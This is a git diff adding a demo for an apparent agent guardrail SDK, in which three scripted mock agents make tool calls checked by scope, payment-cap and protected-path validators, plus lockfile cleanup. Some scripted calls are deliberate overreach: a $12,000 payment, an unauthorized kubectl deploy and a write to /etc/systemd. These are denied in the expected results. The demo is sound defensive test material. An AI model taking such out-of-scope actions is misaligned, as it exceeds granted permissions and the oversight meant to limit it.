+    "decision": "allow"
+  },
+  {
+    "toolName": "execute_command",
+    "args": { "command": "kubectl apply -f deploy.yaml" },
+    "decision": "deny",
+    "reason": "Agent FinanceAgent is not permitted to use execute_command"
+  },
+  {
+    "toolName": "read_file",
+    "args": { "path": "/workspace/deploy/config.yaml" },
+    "decision": "allow"
+  },
+  {
+    "toolName": "write_file",
+    "args": {
+      "path": "/workspace/deploy/config.yaml",
+      "content": "image: app:v2.1.0"
+    },
+    "decision": "allow"
+  },
+  {
+    "toolName": "write_file",
+    "args": {
+      "path": "/etc/systemd/system/app.service",
+      "content": "[Unit]\nDescription=App"
+    },
+    "decision": "deny",
+    "reason": "Write to protected path blocked: /etc/systemd/system/app.service"
+  },
+  {
+    "toolName": "execute_command",
+    "args": { "command": "kubectl rollout restart deployment/app" },
+    "decision": "allow"
+  }
+]

--- a/demo/src/scenarios/03-multi-agent/run.ts
+++ b/demo/src/scenarios/03-multi-agent/run.ts
@@ -1,0 +1,226 @@
+import { Veto, type NamedValidator } from 'veto-sdk';
+import { sendEmail, readFile, writeFile, executeCommand, searchWeb, submitPayment } from '../../lib/mock-tools.js';
+import { runAgent, type PlannedToolCall } from '../../lib/mock-agent.js';
+import * as reporter from '../../lib/reporter.js';
+import expected from './expected.json' with { type: 'json' };
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+function createAgentScopePolicy(agentName: string, allowedTools: string[]): NamedValidator {
+  const toolSet = new Set(allowedTools);
+  return {
+    name: `${agentName}-scope-policy`,
+    description: `Restricts ${agentName} to its permitted tools`,
+    priority: 1,
+    validate: (ctx) => {
+      if (!toolSet.has(ctx.toolName)) {
+        return {
+          decision: 'deny',
+          reason: `Agent ${agentName} is not permitted to use ${ctx.toolName}`,
+        };
+      }
+      return { decision: 'allow' };
+    },
+  };
+}
+
+const paymentLimitPolicy: NamedValidator = {
+  name: 'payment-limit-policy',
+  description: 'Blocks payments above $500',
+  priority: 10,
+  toolFilter: ['submit_payment'],
+  validate: (ctx) => {
+    const amount = Number(ctx.arguments.amount ?? 0);
+    if (amount > 500) {
+      return {
+        decision: 'deny',
+        reason: `Payment of $${amount} exceeds $500 limit`,
+      };
+    }
+    return { decision: 'allow' };
+  },
+};
+
+const readOnlyPathPolicy: NamedValidator = {
+  name: 'read-only-path-policy',
+  description: 'Blocks writes to protected paths',
+  priority: 10,
+  toolFilter: ['write_file'],
+  validate: (ctx) => {
+    const path = String(ctx.arguments.path ?? '');
+    const protectedPaths = ['/etc/', '/usr/', '/sys/', '/root/'];
+    for (const pp of protectedPaths) {
+      if (path.startsWith(pp)) {
+        return {
+          decision: 'deny',
+          reason: `Write to protected path blocked: ${path}`,
+        };
+      }
+    }
+    return { decision: 'allow' };
+  },
+};
+
+const researchAgentCalls: PlannedToolCall[] = [
+  {
+    thought: 'Let me search for the latest pricing data.',
+    toolName: 'search_web',
+    args: { query: 'SaaS pricing benchmarks 2026' },
+  },
+  {
+    thought: 'I found good data. Let me save my research notes.',
+    toolName: 'write_file',
+    args: { path: '/workspace/research/pricing-notes.md', content: '# Pricing Research\n\nMedian SaaS price: $49/mo' },
+  },
+  {
+    thought: 'I should also email the findings to the team.',
+    toolName: 'send_email',
+    args: { to: 'team@acme-corp.com', subject: 'Pricing Research', body: 'Research complete.' },
+  },
+];
+
+const financeAgentCalls: PlannedToolCall[] = [
+  {
+    thought: 'I need to process the monthly subscription payment.',
+    toolName: 'submit_payment',
+    args: { amount: 49, recipient: 'cloud-hosting-inc', memo: 'Monthly hosting fee' },
+  },
+  {
+    thought: 'Now process the annual contract payment.',
+    toolName: 'submit_payment',
+    args: { amount: 12000, recipient: 'enterprise-vendor', memo: 'Annual license renewal' },
+  },
+  {
+    thought: 'Let me read the payment confirmation.',
+    toolName: 'read_file',
+    args: { path: '/workspace/finance/receipt.pdf' },
+  },
+  {
+    thought: 'Maybe I can deploy the updated config directly.',
+    toolName: 'execute_command',
+    args: { command: 'kubectl apply -f deploy.yaml' },
+  },
+];
+
+const devOpsAgentCalls: PlannedToolCall[] = [
+  {
+    thought: 'Let me read the deployment config.',
+    toolName: 'read_file',
+    args: { path: '/workspace/deploy/config.yaml' },
+  },
+  {
+    thought: 'I need to update the config with the new image tag.',
+    toolName: 'write_file',
+    args: { path: '/workspace/deploy/config.yaml', content: 'image: app:v2.1.0' },
+  },
+  {
+    thought: 'Let me also modify the system config to fix a boot issue.',
+    toolName: 'write_file',
+    args: { path: '/etc/systemd/system/app.service', content: '[Unit]\nDescription=App' },
+  },
+  {
+    thought: 'Deploy the changes.',
+    toolName: 'execute_command',
+    args: { command: 'kubectl rollout restart deployment/app' },
+  },
+];
+
+export async function run(): Promise<boolean> {
+  reporter.scenarioHeader('03', 'Multi-Agent Coordination', 'Three specialized agents with different permissions operate under Veto enforcement.');
+
+  const allTools = [sendEmail, readFile, writeFile, executeCommand, searchWeb, submitPayment];
+  const allResults: reporter.DemoResult[] = [];
+
+  // --- Research Agent ---
+  reporter.info('=== Research Agent (allowed: search_web, write_file, read_file) ===');
+  console.log();
+
+  const researchVeto = await Veto.init({
+    configDir: join(__dirname, 'veto'),
+    mode: 'strict',
+    logLevel: 'silent',
+    validators: [
+      createAgentScopePolicy('ResearchAgent', ['search_web', 'write_file', 'read_file']),
+      readOnlyPathPolicy,
+    ],
+  });
+  const researchWrapped = researchVeto.wrap(allTools);
+  const researchHandlers: Record<string, (args: Record<string, unknown>) => Promise<unknown>> = {};
+  for (const t of researchWrapped) {
+    if ('handler' in t && typeof t.handler === 'function') {
+      researchHandlers[t.name] = t.handler as (args: Record<string, unknown>) => Promise<unknown>;
+    }
+  }
+  const researchResults = await runAgent({ name: 'ResearchAgent', tools: researchHandlers }, researchAgentCalls);
+  allResults.push(...researchResults);
+
+  reporter.separator();
+
+  // --- Finance Agent ---
+  reporter.info('=== Finance Agent (allowed: submit_payment, read_file, send_email) ===');
+  console.log();
+
+  const financeVeto = await Veto.init({
+    configDir: join(__dirname, 'veto'),
+    mode: 'strict',
+    logLevel: 'silent',
+    validators: [
+      createAgentScopePolicy('FinanceAgent', ['submit_payment', 'read_file', 'send_email']),
+      paymentLimitPolicy,
+    ],
+  });
+  const financeWrapped = financeVeto.wrap(allTools);
+  const financeHandlers: Record<string, (args: Record<string, unknown>) => Promise<unknown>> = {};
+  for (const t of financeWrapped) {
+    if ('handler' in t && typeof t.handler === 'function') {
+      financeHandlers[t.name] = t.handler as (args: Record<string, unknown>) => Promise<unknown>;
+    }
+  }
+  const financeResults = await runAgent({ name: 'FinanceAgent', tools: financeHandlers }, financeAgentCalls);
+  allResults.push(...financeResults);
+
+  reporter.separator();
+
+  // --- DevOps Agent ---
+  reporter.info('=== DevOps Agent (allowed: read_file, write_file, execute_command) ===');
+  console.log();
+
+  const devOpsVeto = await Veto.init({
+    configDir: join(__dirname, 'veto'),
+    mode: 'strict',
+    logLevel: 'silent',
+    validators: [
+      createAgentScopePolicy('DevOpsAgent', ['read_file', 'write_file', 'execute_command']),
+      readOnlyPathPolicy,
+    ],
+  });
+  const devOpsWrapped = devOpsVeto.wrap(allTools);
+  const devOpsHandlers: Record<string, (args: Record<string, unknown>) => Promise<unknown>> = {};
+  for (const t of devOpsWrapped) {
+    if ('handler' in t && typeof t.handler === 'function') {
+      devOpsHandlers[t.name] = t.handler as (args: Record<string, unknown>) => Promise<unknown>;
+    }
+  }
+  const devOpsResults = await runAgent({ name: 'DevOpsAgent', tools: devOpsHandlers }, devOpsAgentCalls);
+  allResults.push(...devOpsResults);
+
+  // Overall summary
+  const stats = {
+    total: allResults.length,
+    allowed: allResults.filter((r) => r.decision === 'allow').length,
+    denied: allResults.filter((r) => r.decision === 'deny').length,
+  };
+  reporter.summary(stats);
+
+  reporter.separator();
+  const pass = reporter.compareResults(allResults, expected as reporter.DemoResult[]);
+  return pass;
+}
+
+if (process.argv[1] && process.argv[1].includes('03-multi-agent')) {
+  run().then((pass) => {
+    process.exit(pass ? 0 : 1);
+  });
+}

--- a/demo/src/scenarios/03-multi-agent/veto/veto.config.yaml
+++ b/demo/src/scenarios/03-multi-agent/veto/veto.config.yaml
@@ -1,0 +1,6 @@
+version: "1.0"
+mode: "strict"
+logging:
+  level: "silent"
+rules:
+  directory: "./rules"

--- a/demo/tsconfig.json
+++ b/demo/tsconfig.json
@@ -1,0 +1,15 @@
+{
+  "compilerOptions": {
+    "target": "ES2022",
+    "module": "ESNext",
+    "moduleResolution": "bundler",
+    "esModuleInterop": true,
+    "strict": true,
+    "skipLibCheck": true,
+    "outDir": "dist",
+    "rootDir": "src",
+    "declaration": false,
+    "sourceMap": false
+  },
+  "include": ["src"]
+}

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -35,85 +35,18 @@ importers:
         specifier: ^8.52.0
         version: 8.52.0(eslint@9.39.2(jiti@1.21.7))(typescript@5.9.3)
 
-  apps/web:
+  demo:
     dependencies:
-      react:
-        specifier: ^18.3.1
-        version: 18.3.1
-      react-dom:
-        specifier: ^18.3.1
-        version: 18.3.1(react@18.3.1)
+      veto-sdk:
+        specifier: workspace:*
+        version: link:../packages/sdk
     devDependencies:
-      "@types/react":
-        specifier: ^18.3.0
-        version: 18.3.27
-      "@types/react-dom":
-        specifier: ^18.3.0
-        version: 18.3.7(@types/react@18.3.27)
-      "@vitejs/plugin-react":
-        specifier: ^4.3.0
-        version: 4.7.0(vite@5.4.21(@types/node@22.19.3))
-      autoprefixer:
-        specifier: ^10.4.19
-        version: 10.4.23(postcss@8.5.6)
-      postcss:
-        specifier: ^8.4.38
-        version: 8.5.6
-      tailwindcss:
-        specifier: ^3.4.4
-        version: 3.4.19(tsx@4.21.0)(yaml@2.8.2)
-      typescript:
-        specifier: ^5.7.0
-        version: 5.9.3
-      vite:
-        specifier: ^5.4.0
-        version: 5.4.21(@types/node@22.19.3)
-
-  packages/cli:
-    dependencies:
-      "@google/genai":
-        specifier: ^1.34.0
-        version: 1.34.0
-      chokidar:
-        specifier: ^4.0.3
-        version: 4.0.3
-      glob:
-        specifier: ^11.0.0
-        version: 11.1.0
-      micromatch:
-        specifier: ^4.0.8
-        version: 4.0.8
-      prompts:
-        specifier: ^2.4.2
-        version: 2.4.2
-      web-tree-sitter:
-        specifier: ^0.26.3
-        version: 0.26.3
-      yaml:
-        specifier: ^2.8.2
-        version: 2.8.2
-    devDependencies:
-      "@types/micromatch":
-        specifier: ^4.0.9
-        version: 4.0.10
-      "@types/node":
-        specifier: ^22.0.0
-        version: 22.19.3
-      "@types/prompts":
-        specifier: ^2.4.9
-        version: 2.4.9
-      tree-sitter-wasms:
-        specifier: ^0.1.13
-        version: 0.1.13
       tsx:
-        specifier: ^4.19.0
+        specifier: ^4.7.0
         version: 4.21.0
       typescript:
-        specifier: ^5.7.0
+        specifier: ^5.3.0
         version: 5.9.3
-      vitest:
-        specifier: ^4.0.16
-        version: 4.0.16(@types/node@22.19.3)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2)
 
   packages/sdk:
     dependencies:
@@ -150,83 +83,11 @@ importers:
         version: 4.0.16(@types/node@20.19.27)(jiti@1.21.7)(tsx@4.21.0)(yaml@2.8.2)
 
 packages:
-  "@alloc/quick-lru@5.2.0":
-    resolution:
-      {
-        integrity: sha512-UrcABB+4bUrFABwbluTIBErXwvbsU/V7TZWfmbgJfbkwiBuziS9gxdODUyuiecfdGQ85jglMW6juS3+z5TsKLw==,
-      }
-    engines: { node: ">=10" }
-
   "@anthropic-ai/sdk@0.20.9":
     resolution:
       {
         integrity: sha512-Lq74+DhiEQO6F9/gdVOLmHx57pX45ebK2Q/zH14xYe1157a7QeUVknRqIp0Jz5gQI01o7NKbuv9Dag2uQsLjDg==,
       }
-
-  "@babel/code-frame@7.27.1":
-    resolution:
-      {
-        integrity: sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/compat-data@7.28.5":
-    resolution:
-      {
-        integrity: sha512-6uFXyCayocRbqhZOB+6XcuZbkMNimwfVGFji8CTZnCzOHVGvDqzvitu1re2AU5LROliz7eQPhB8CpAMvnx9EjA==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/core@7.28.5":
-    resolution:
-      {
-        integrity: sha512-e7jT4DxYvIDLk1ZHmU/m/mB19rex9sv0c2ftBtjSBv+kVM/902eh0fINUzD7UwLLNR+jU585GxUJ8/EBfAM5fw==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/generator@7.28.5":
-    resolution:
-      {
-        integrity: sha512-3EwLFhZ38J4VyIP6WNtt2kUdW9dokXA9Cr4IVIFHuCpZ3H8/YFOl5JjZHisrn1fATPBmKKqXzDFvh9fUwHz6CQ==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/helper-compilation-targets@7.27.2":
-    resolution:
-      {
-        integrity: sha512-2+1thGUUWWjLTYTHZWK1n8Yga0ijBz1XAhUXcKy81rd5g6yh7hGqMp45v7cadSbEHc9G3OTv45SyneRN3ps4DQ==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/helper-globals@7.28.0":
-    resolution:
-      {
-        integrity: sha512-+W6cISkXFa1jXsDEdYA8HeevQT/FULhxzR99pxphltZcVaugps53THCeiWA8SguxxpSp3gKPiuYfSWopkLQ4hw==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/helper-module-imports@7.27.1":
-    resolution:
-      {
-        integrity: sha512-0gSFWUPNXNopqtIPQvlD5WgXYI5GY2kP2cCvoT8kczjbfcfuIljTbcWrulD1CIPIX2gt1wghbDy08yE1p+/r3w==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/helper-module-transforms@7.28.3":
-    resolution:
-      {
-        integrity: sha512-gytXUbs8k2sXS9PnQptz5o0QnpLL51SwASIORY6XaBKF88nsOT0Zw9szLqlSGQDP/4TljBAD5y98p2U1fqkdsw==,
-      }
-    engines: { node: ">=6.9.0" }
-    peerDependencies:
-      "@babel/core": ^7.0.0
-
-  "@babel/helper-plugin-utils@7.27.1":
-    resolution:
-      {
-        integrity: sha512-1gn1Up5YXka3YYAHGKpbideQ5Yjf1tDa9qYcgysz+cNCXukyLl6DjPXhD3VRwSb8c0J9tA4b2+rHEZtc6R0tlw==,
-      }
-    engines: { node: ">=6.9.0" }
 
   "@babel/helper-string-parser@7.27.1":
     resolution:
@@ -242,20 +103,6 @@ packages:
       }
     engines: { node: ">=6.9.0" }
 
-  "@babel/helper-validator-option@7.27.1":
-    resolution:
-      {
-        integrity: sha512-YvjJow9FxbhFFKDSuFnVCe2WxXk1zWc22fFePVNEaWJEu8IrZVlda6N0uHwzZrUM1il7NC9Mlp4MaJYbYd9JSg==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/helpers@7.28.4":
-    resolution:
-      {
-        integrity: sha512-HFN59MmQXGHVyYadKLVumYsA9dBFun/ldYxipEjzA4196jpLZd8UjEEBLkbEkvfYreDqJhZxYAWFPtrfhNpj4w==,
-      }
-    engines: { node: ">=6.9.0" }
-
   "@babel/parser@7.28.5":
     resolution:
       {
@@ -264,42 +111,10 @@ packages:
     engines: { node: ">=6.0.0" }
     hasBin: true
 
-  "@babel/plugin-transform-react-jsx-self@7.27.1":
-    resolution:
-      {
-        integrity: sha512-6UzkCs+ejGdZ5mFFC/OCUrv028ab2fp1znZmCZjAOBKiBK2jXD1O+BPSfX8X2qjJ75fZBMSnQn3Rq2mrBJK2mw==,
-      }
-    engines: { node: ">=6.9.0" }
-    peerDependencies:
-      "@babel/core": ^7.0.0-0
-
-  "@babel/plugin-transform-react-jsx-source@7.27.1":
-    resolution:
-      {
-        integrity: sha512-zbwoTsBruTeKB9hSq73ha66iFeJHuaFkUbwvqElnygoNbj/jHRsSeokowZFN3CZ64IvEqcmmkVe89OPXc7ldAw==,
-      }
-    engines: { node: ">=6.9.0" }
-    peerDependencies:
-      "@babel/core": ^7.0.0-0
-
   "@babel/runtime@7.28.4":
     resolution:
       {
         integrity: sha512-Q/N6JNWvIvPnLDvjlE1OUBLPQHH6l3CltCEsHIujp45zQUSSh8K+gHnaEX45yAT1nyngnINhvWtzN+Nb9D8RAQ==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/template@7.27.2":
-    resolution:
-      {
-        integrity: sha512-LPDZ85aEJyYSd18/DkjNh4/y1ntkE5KwUHWTiqgRxruuZL2F1yuHligVHLvcHY2vMHXttKFpJn6LwfI7cw7ODw==,
-      }
-    engines: { node: ">=6.9.0" }
-
-  "@babel/traverse@7.28.5":
-    resolution:
-      {
-        integrity: sha512-TCCj4t55U90khlYkVV/0TfkJkAkUg3jZFA3Neb7unZT8CPok7iiRfaX0F+WnqWqt7OxhOn0uBKXCw4lbL8W0aQ==,
       }
     engines: { node: ">=6.9.0" }
 
@@ -438,15 +253,6 @@ packages:
         integrity: sha512-CdTLvIOPiCNuH71pyDu3rA+Q0n65cmAbXnwWH84rKGiFumFzkmHNT8KHTMEchcxN+Kl8I54xGUhJ7l3E7X396Q==,
       }
 
-  "@esbuild/aix-ppc64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ==,
-      }
-    engines: { node: ">=12" }
-    cpu: [ppc64]
-    os: [aix]
-
   "@esbuild/aix-ppc64@0.27.2":
     resolution:
       {
@@ -456,15 +262,6 @@ packages:
     cpu: [ppc64]
     os: [aix]
 
-  "@esbuild/android-arm64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-c0uX9VAUBQ7dTDCjq+wdyGLowMdtR/GoC2U5IYk/7D1H1JYC0qseD7+11iMP2mRLN9RcCMRcjC4YMclCzGwS/A==,
-      }
-    engines: { node: ">=12" }
-    cpu: [arm64]
-    os: [android]
-
   "@esbuild/android-arm64@0.27.2":
     resolution:
       {
@@ -472,15 +269,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [arm64]
-    os: [android]
-
-  "@esbuild/android-arm@0.21.5":
-    resolution:
-      {
-        integrity: sha512-vCPvzSjpPHEi1siZdlvAlsPxXl7WbOVUBBAowWug4rJHb68Ox8KualB+1ocNvT5fjv6wpkX6o/iEpbDrf68zcg==,
-      }
-    engines: { node: ">=12" }
-    cpu: [arm]
     os: [android]
 
   "@esbuild/android-arm@0.27.2":
@@ -492,15 +280,6 @@ packages:
     cpu: [arm]
     os: [android]
 
-  "@esbuild/android-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-D7aPRUUNHRBwHxzxRvp856rjUHRFW1SdQATKXH2hqA0kAZb1hKmi02OpYRacl0TxIGz/ZmXWlbZgjwWYaCakTA==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
-    os: [android]
-
   "@esbuild/android-x64@0.27.2":
     resolution:
       {
@@ -510,15 +289,6 @@ packages:
     cpu: [x64]
     os: [android]
 
-  "@esbuild/darwin-arm64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-DwqXqZyuk5AiWWf3UfLiRDJ5EDd49zg6O9wclZ7kUMv2WRFr4HKjXp/5t8JZ11QbQfUS6/cRCKGwYhtNAY88kQ==,
-      }
-    engines: { node: ">=12" }
-    cpu: [arm64]
-    os: [darwin]
-
   "@esbuild/darwin-arm64@0.27.2":
     resolution:
       {
@@ -526,15 +296,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [arm64]
-    os: [darwin]
-
-  "@esbuild/darwin-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-se/JjF8NlmKVG4kNIuyWMV/22ZaerB+qaSi5MdrXtd6R08kvs2qCN4C09miupktDitvh8jRFflwGFBQcxZRjbw==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
     os: [darwin]
 
   "@esbuild/darwin-x64@0.27.2":
@@ -546,15 +307,6 @@ packages:
     cpu: [x64]
     os: [darwin]
 
-  "@esbuild/freebsd-arm64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-5JcRxxRDUJLX8JXp/wcBCy3pENnCgBR9bN6JsY4OmhfUtIHe3ZW0mawA7+RDAcMLrMIZaf03NlQiX9DGyB8h4g==,
-      }
-    engines: { node: ">=12" }
-    cpu: [arm64]
-    os: [freebsd]
-
   "@esbuild/freebsd-arm64@0.27.2":
     resolution:
       {
@@ -562,15 +314,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [arm64]
-    os: [freebsd]
-
-  "@esbuild/freebsd-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-J95kNBj1zkbMXtHVH29bBriQygMXqoVQOQYA+ISs0/2l3T9/kj42ow2mpqerRBxDJnmkUDCaQT/dfNXWX/ZZCQ==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
     os: [freebsd]
 
   "@esbuild/freebsd-x64@0.27.2":
@@ -582,15 +325,6 @@ packages:
     cpu: [x64]
     os: [freebsd]
 
-  "@esbuild/linux-arm64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-ibKvmyYzKsBeX8d8I7MH/TMfWDXBF3db4qM6sy+7re0YXya+K1cem3on9XgdT2EQGMu4hQyZhan7TeQ8XkGp4Q==,
-      }
-    engines: { node: ">=12" }
-    cpu: [arm64]
-    os: [linux]
-
   "@esbuild/linux-arm64@0.27.2":
     resolution:
       {
@@ -598,15 +332,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [arm64]
-    os: [linux]
-
-  "@esbuild/linux-arm@0.21.5":
-    resolution:
-      {
-        integrity: sha512-bPb5AHZtbeNGjCKVZ9UGqGwo8EUu4cLq68E95A53KlxAPRmUyYv2D6F0uUI65XisGOL1hBP5mTronbgo+0bFcA==,
-      }
-    engines: { node: ">=12" }
-    cpu: [arm]
     os: [linux]
 
   "@esbuild/linux-arm@0.27.2":
@@ -618,15 +343,6 @@ packages:
     cpu: [arm]
     os: [linux]
 
-  "@esbuild/linux-ia32@0.21.5":
-    resolution:
-      {
-        integrity: sha512-YvjXDqLRqPDl2dvRODYmmhz4rPeVKYvppfGYKSNGdyZkA01046pLWyRKKI3ax8fbJoK5QbxblURkwK/MWY18Tg==,
-      }
-    engines: { node: ">=12" }
-    cpu: [ia32]
-    os: [linux]
-
   "@esbuild/linux-ia32@0.27.2":
     resolution:
       {
@@ -634,15 +350,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [ia32]
-    os: [linux]
-
-  "@esbuild/linux-loong64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-uHf1BmMG8qEvzdrzAqg2SIG/02+4/DHB6a9Kbya0XDvwDEKCoC8ZRWI5JJvNdUjtciBGFQ5PuBlpEOXQj+JQSg==,
-      }
-    engines: { node: ">=12" }
-    cpu: [loong64]
     os: [linux]
 
   "@esbuild/linux-loong64@0.27.2":
@@ -654,15 +361,6 @@ packages:
     cpu: [loong64]
     os: [linux]
 
-  "@esbuild/linux-mips64el@0.21.5":
-    resolution:
-      {
-        integrity: sha512-IajOmO+KJK23bj52dFSNCMsz1QP1DqM6cwLUv3W1QwyxkyIWecfafnI555fvSGqEKwjMXVLokcV5ygHW5b3Jbg==,
-      }
-    engines: { node: ">=12" }
-    cpu: [mips64el]
-    os: [linux]
-
   "@esbuild/linux-mips64el@0.27.2":
     resolution:
       {
@@ -670,15 +368,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [mips64el]
-    os: [linux]
-
-  "@esbuild/linux-ppc64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-1hHV/Z4OEfMwpLO8rp7CvlhBDnjsC3CttJXIhBi+5Aj5r+MBvy4egg7wCbe//hSsT+RvDAG7s81tAvpL2XAE4w==,
-      }
-    engines: { node: ">=12" }
-    cpu: [ppc64]
     os: [linux]
 
   "@esbuild/linux-ppc64@0.27.2":
@@ -690,15 +379,6 @@ packages:
     cpu: [ppc64]
     os: [linux]
 
-  "@esbuild/linux-riscv64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-2HdXDMd9GMgTGrPWnJzP2ALSokE/0O5HhTUvWIbD3YdjME8JwvSCnNGBnTThKGEB91OZhzrJ4qIIxk/SBmyDDA==,
-      }
-    engines: { node: ">=12" }
-    cpu: [riscv64]
-    os: [linux]
-
   "@esbuild/linux-riscv64@0.27.2":
     resolution:
       {
@@ -708,15 +388,6 @@ packages:
     cpu: [riscv64]
     os: [linux]
 
-  "@esbuild/linux-s390x@0.21.5":
-    resolution:
-      {
-        integrity: sha512-zus5sxzqBJD3eXxwvjN1yQkRepANgxE9lgOW2qLnmr8ikMTphkjgXu1HR01K4FJg8h1kEEDAqDcZQtbrRnB41A==,
-      }
-    engines: { node: ">=12" }
-    cpu: [s390x]
-    os: [linux]
-
   "@esbuild/linux-s390x@0.27.2":
     resolution:
       {
@@ -724,15 +395,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [s390x]
-    os: [linux]
-
-  "@esbuild/linux-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-1rYdTpyv03iycF1+BhzrzQJCdOuAOtaqHTWJZCWvijKD2N5Xu0TtVC8/+1faWqcP9iBCWOmjmhoH94dH82BxPQ==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
     os: [linux]
 
   "@esbuild/linux-x64@0.27.2":
@@ -753,15 +415,6 @@ packages:
     cpu: [arm64]
     os: [netbsd]
 
-  "@esbuild/netbsd-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-Woi2MXzXjMULccIwMnLciyZH4nCIMpWQAs049KEeMvOcNADVxo0UBIQPfSmxB3CWKedngg7sWZdLvLczpe0tLg==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
-    os: [netbsd]
-
   "@esbuild/netbsd-x64@0.27.2":
     resolution:
       {
@@ -778,15 +431,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [arm64]
-    os: [openbsd]
-
-  "@esbuild/openbsd-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-HLNNw99xsvx12lFBUwoT8EVCsSvRNDVxNpjZ7bPn947b8gJPzeHWyNVhFsaerc0n3TsbOINvRP2byTZ5LKezow==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
     os: [openbsd]
 
   "@esbuild/openbsd-x64@0.27.2":
@@ -807,15 +451,6 @@ packages:
     cpu: [arm64]
     os: [openharmony]
 
-  "@esbuild/sunos-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-6+gjmFpfy0BHU5Tpptkuh8+uw3mnrvgs+dSPQXQOv3ekbordwnzTVEb4qnIvQcYXq6gzkyTnoZ9dZG+D4garKg==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
-    os: [sunos]
-
   "@esbuild/sunos-x64@0.27.2":
     resolution:
       {
@@ -824,15 +459,6 @@ packages:
     engines: { node: ">=18" }
     cpu: [x64]
     os: [sunos]
-
-  "@esbuild/win32-arm64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-Z0gOTd75VvXqyq7nsl93zwahcTROgqvuAcYDUr+vOv8uHhNSKROyU961kgtCD1e95IqPKSQKH7tBTslnS3tA8A==,
-      }
-    engines: { node: ">=12" }
-    cpu: [arm64]
-    os: [win32]
 
   "@esbuild/win32-arm64@0.27.2":
     resolution:
@@ -843,15 +469,6 @@ packages:
     cpu: [arm64]
     os: [win32]
 
-  "@esbuild/win32-ia32@0.21.5":
-    resolution:
-      {
-        integrity: sha512-SWXFF1CL2RVNMaVs+BBClwtfZSvDgtL//G/smwAc5oVK/UPu2Gu9tIaRgFmYFFKrmg3SyAjSrElf0TiJ1v8fYA==,
-      }
-    engines: { node: ">=12" }
-    cpu: [ia32]
-    os: [win32]
-
   "@esbuild/win32-ia32@0.27.2":
     resolution:
       {
@@ -859,15 +476,6 @@ packages:
       }
     engines: { node: ">=18" }
     cpu: [ia32]
-    os: [win32]
-
-  "@esbuild/win32-x64@0.21.5":
-    resolution:
-      {
-        integrity: sha512-tQd/1efJuzPC6rCFwEvLtci/xNFcTZknmXs98FYDfGE4wP9ClFV98nyKrzJKVPMhdDnjzLhdUyMX4PsQAPjwIw==,
-      }
-    engines: { node: ">=12" }
-    cpu: [x64]
     os: [win32]
 
   "@esbuild/win32-x64@0.27.2":
@@ -996,38 +604,12 @@ packages:
       "@types/node":
         optional: true
 
-  "@isaacs/balanced-match@4.0.1":
-    resolution:
-      {
-        integrity: sha512-yzMTt9lEb8Gv7zRioUilSglI0c0smZ9k5D65677DLWLtWJaXIS3CqcGyUFByYKlnUj6TkjLVs54fBl6+TiGQDQ==,
-      }
-    engines: { node: 20 || >=22 }
-
-  "@isaacs/brace-expansion@5.0.0":
-    resolution:
-      {
-        integrity: sha512-ZT55BDLV0yv0RBm2czMiZ+SqCGO7AvmOM3G/w2xhVPH+te0aKgFjmBvGlL1dH+ql2tgGO3MVrbb3jCKyvpgnxA==,
-      }
-    engines: { node: 20 || >=22 }
-
   "@isaacs/cliui@8.0.2":
     resolution:
       {
         integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==,
       }
     engines: { node: ">=12" }
-
-  "@jridgewell/gen-mapping@0.3.13":
-    resolution:
-      {
-        integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==,
-      }
-
-  "@jridgewell/remapping@2.3.5":
-    resolution:
-      {
